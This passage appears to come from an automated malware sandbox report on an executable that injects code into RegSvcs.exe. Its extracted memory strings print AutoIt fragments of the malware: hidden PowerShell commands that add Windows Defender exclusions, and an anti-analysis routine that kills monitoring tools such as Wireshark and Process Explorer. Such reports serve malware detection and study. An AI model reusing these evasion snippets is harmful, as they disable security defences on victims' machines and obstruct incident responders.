                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA7008Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1100008Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E54000Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 92F008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EE1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00EE1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E83312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,8_2_00E83312
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_6b4e538f-c
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_fd5e2138-b
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamememstr_ad77d13e-4
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextmemstr_a52b340b-3
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usbmemstr_a31f99c4-8
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antivirusmemstr_824e47cc-6
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()memstr_588d6584-0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" thenmemstr_a94a0c68-4
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadminmemstr_90b4c6b0-c
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)memstr_0cab6921-e
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_7a611f43-a
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)memstr_b40f85a7-8
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)memstr_8923ad49-4
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)memstr_49941ef8-3
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)memstr_16f4a083-d
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_2137f059-3
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_31e57e8f-c
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_65dc9633-0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_be9b71cd-a
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_e6268bdd-6
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_d1b87b8f-3
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_988a48c8-6
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifmemstr_8c01d45e-3
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process hacker") thenmemstr_620e61b6-4
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process hacker")memstr_bdf556b5-2
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("processhacker.exe")memstr_0feef11c-8
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("taskmgr.exe") thenmemstr_a24ba7c1-3
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("taskmgr.exe")memstr_233c2ece-4
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("regshot.exe") thenmemstr_765b8328-d
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("regshot.exe")memstr_e302cc10-2
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("smartsniff") thenmemstr_07e50c7c-6
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("smartsniff")memstr_7743e060-7
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("wireshark") thenmemstr_dcaaca40-c
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("wireshark")memstr_62665e3e-b
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("tcpeye") thenmemstr_e29a5ffb-d
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("tcpeye")memstr_51f940d3-b
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("tcpeye.exe")memstr_5fbc8be9-5
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antianalysismemstr_3e6ee398-a
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v203h4fp31lpw870v7memstr_3d03c440-a
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $_y0x3856f9c703e6af597b4b = 267 then ; x86 versionmemstr_eae524ec-6
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $_y0x3856f9c80ff2bc5f51660df0cdd6 thenmemstr_3e04ee76-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,v^~;do,memstr_f4688637-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c:\p1memstr_cf661c2d-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersmemstr_b7ec63ac-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: users<memstr_0804038a-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usersmemstr_dfdaa98b-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: alfonsmemstr_73e4515b-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user>memstr_24713de1-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usermemstr_8cac106f-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1dwslmemstr_d2c99f3e-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatamemstr_7e326772-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata@memstr_853aab54-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(z]z.memstr_27970722-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(z]z.bmemstr_26ecb6af-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdgappdatamemstr_cac8d9f5-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p1(z[zmemstr_cbbbc001-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localmemstr_38f7785f-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local<memstr_25bf2b4d-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwsl(z]z.vmemstr_0f75718b-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pdatamemstr_ad6d1040-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pdata@memstr_88105664-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39180imemstr_b606577a-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39182ememstr_8c176a98-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39178[memstr_28c0c74c-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39184qmemstr_7515f1dc-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39177wmemstr_b17760ab-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39179mmemstr_33a42ed6-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39185cmemstr_560be92a-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39181ymemstr_43811987-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39186memstr_ca355945-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39183memstr_9ecf0ffb-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39123memstr_8ab229de-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39187memstr_f9858a27-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39188memstr_16ce6805-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39189)memstr_a739d64a-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39190/memstr_349793d5-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39191%memstr_ac7b72d1-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @propsys.dll,-39176memstr_aae12695-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: searchesmemstr_7a130ee7-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camera rollmemstr_e9df8f81-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: librariesmemstr_674ab865-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrivememstr_35f08ca7-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentmemstr_1adfceea-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsmemstr_569c82db-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cd burningmemstr_5207cd16-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local musicmmemstr_67721468-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloadsumemstr_11ccab74-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: webhistoryymemstr_9b9300cb-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesqmemstr_81d22e38-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: web historymemstr_b83d24f4-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: webhistorymemstr_368f1ab6-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documents9memstr_38ba941e-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hj(5w<memstr_00477443-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_1ebf1ead-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\musicwmemstr_cce1a190-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videosememstr_4fd3bb3a-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: known folder manager-memstr_59a96a8b-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lmem memstr_fd75bbe5-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: negoextenderindlmem pmemstr_1ce2d341-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktopmemstr_57ab96af-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop@memstr_48d55499-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .desktopmemstr_41c410eb-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [.shellclassinfomemstr_f797223d-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21769memstr_5e5ee585-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-183memstr_de7ce0d6-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{d3162b92-9365-467a-956b-92703aca08af}memstr_e099b0b3-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qspg%memstr_b3db9888-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcachezmemstr_cfe1d607-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup-memstr_9f747ef8-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu>memstr_944c92c4-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\librariesmemstr_b4ace0da-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcookiesmemstr_3d453bc3-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x1dw(mmemstr_cfdcde05-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usersdmemstr_4b4b59ae-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: owh(z]z.memstr_adca3cc3-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :nvmusers@shell32.dll,-21813memstr_1f78ae68-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\recentmemstr_58e20124-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =9ncalrpc:[epmapper,security=impersonation dynamic false]memstr_e4555335-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pc:\programdata\microsoft\windows\start menu\desktop.inimemstr_e3909893-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\desktop.inimemstr_b4d41d48-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\libraries\desktop.inimemstr_b99ab084-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup\desktop.inimemstr_972773ef-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\desktop.inimemstr_f822be8b-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\accessibility\desktop.inimemstr_b2f6e748-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\windows powershell\desktop.inimemstr_caa94329-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\accessories\system tools\desktop.inimemstr_680496d4-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\desktop.inimemstr_2606f2df-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsdmemstr_29840e99-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .documentsmemstr_c7c06cba-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesmemstr_fa1ab7ba-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesbmemstr_35485220-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .picturesmemstr_208bd579-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}memstr_8e21f023-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21770memstr_2bd947aa-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-112memstr_4302223a-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconfile%systemroot%\system32\shell32.dllmemstr_d815ee3c-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-235memstr_33866cdc-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .iitdo.vbememstr_6bb136cd-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:p(a;oici;fa;;;ba)(a;oici;0x1200a9;;;iu)(a;oici;fa;;;sy)vmemstr_140d366d-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .appdatamemstr_8a32272b-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roamingmemstr_6ea3ffbf-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roaming@memstr_46c5ae91-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .roamingmemstr_c62ff409-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoftmemstr_0ebf1e58-7
